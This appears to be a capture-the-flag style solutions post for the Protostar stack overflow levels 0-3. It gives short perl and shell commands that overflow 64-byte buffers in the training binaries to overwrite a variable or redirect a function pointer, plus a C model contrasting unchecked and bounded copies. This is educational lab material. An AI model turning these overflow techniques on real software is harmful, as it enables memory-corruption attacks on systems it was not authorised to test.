Protostar Stack Exploits (Solutions 0-3)
Buffer overflow exploit exercises, part one.
Protostar is a series of exercises from Exploit Exercises. In addition to three final levels, it has four basic sections: network programming, format strings, heap overflows, and stack overflows.
This series of posts contains solutions and walkthroughs for the stack overflow levels (“Stack”). It assumes basic knowledge of systems programming and is meant to serve as a reference for those stuck on certain levels.
This is the first of three posts for Stack. The first four levels are straightforward, and their corresponding posts contain little explanation (solutions). The last three levels have more potential pitfalls, and those posts contain more detailed explanations (walkthroughs).
## Stack: Level 0

Description (full): Overwrite a variable on the stack.

```
$ perl -e "print 'a'x65" | ./stack0
you have changed the 'modified' variable
```
## Stack: Level 1

Description (full): Overwrite a variable on the stack with a specific series of hex values.

```
$ ./stack1 $(perl -e "print 'a'x64 . 'dcba'")
you have correctly got the variable to the right value
```
## Stack: Level 2

Description (full): Overwrite a variable by using an environmental variable.

```
$ export GREENIE=$(echo -e "$(perl -e "print 'a'x64")\n\r\n\r")
$ ./stack2
you have correctly modified the variable
```
## Stack: Level 3

Description (full): Overwrite a function pointer.

```
$ objdump -d ./stack3 | grep win
08048424 <win>:
$ echo -e "$(perl -e "print 'a'x64")\x24\x84\x04\x08" | ./stack3
calling function pointer, jumping to 08048424
code flow successfully changed
```
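The model below is an added example, not code from the exercises or from the original post. It shows why the four bytes that follow the 64 filler bytes in levels 1-3 end up as the checked value, and how a bounded copy leaves that value untouched. The `struct frame` layout and the function names are assumptions made for illustration; the 64-byte size is taken from the padding in the commands above.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model frame (an assumption, not the levels' source): a 64-byte buffer
 * immediately followed by the 4 bytes of the value each level checks. */
struct frame {
    char buffer[64];
    unsigned char adjacent[4];
};

/* Read the adjacent bytes as the i386 target does: little-endian. */
static uint32_t adjacent_value(const struct frame *f) {
    return (uint32_t)f->adjacent[0] | (uint32_t)f->adjacent[1] << 8 |
           (uint32_t)f->adjacent[2] << 16 | (uint32_t)f->adjacent[3] << 24;
}

/* Unchecked copy, standing in for gets()/strcpy(): len is never compared
 * with sizeof buffer. Clamped to the model frame so the demo is defined. */
static uint32_t copy_unchecked(const char *in, size_t len) {
    struct frame f;
    memset(&f, 0, sizeof f);
    if (len > sizeof f) len = sizeof f;
    memcpy(&f, in, len);
    return adjacent_value(&f);
}

/* Bounded copy: input is truncated to the buffer, neighbour untouched. */
static uint32_t copy_bounded(const char *in, size_t len) {
    struct frame f;
    memset(&f, 0, sizeof f);
    if (len > sizeof f.buffer - 1) len = sizeof f.buffer - 1;
    memcpy(f.buffer, in, len);
    return adjacent_value(&f);
}

int main(void) {
    /* The 4-byte tails used for levels 1-3 above, after 64 filler bytes. */
    const char *tails[] = { "dcba", "\n\r\n\r", "\x24\x84\x04\x08" };
    char in[68];
    memset(in, 'a', 64);
    for (int i = 0; i < 3; i++) {
        memcpy(in + 64, tails[i], 4);
        printf("unchecked: 0x%08x  bounded: 0x%08x\n",
               (unsigned)copy_unchecked(in, sizeof in),
               (unsigned)copy_bounded(in, sizeof in));
    }
    return 0;
}
```

Because the target is little-endian, the byte order in each tail is the reverse of the hex value it produces.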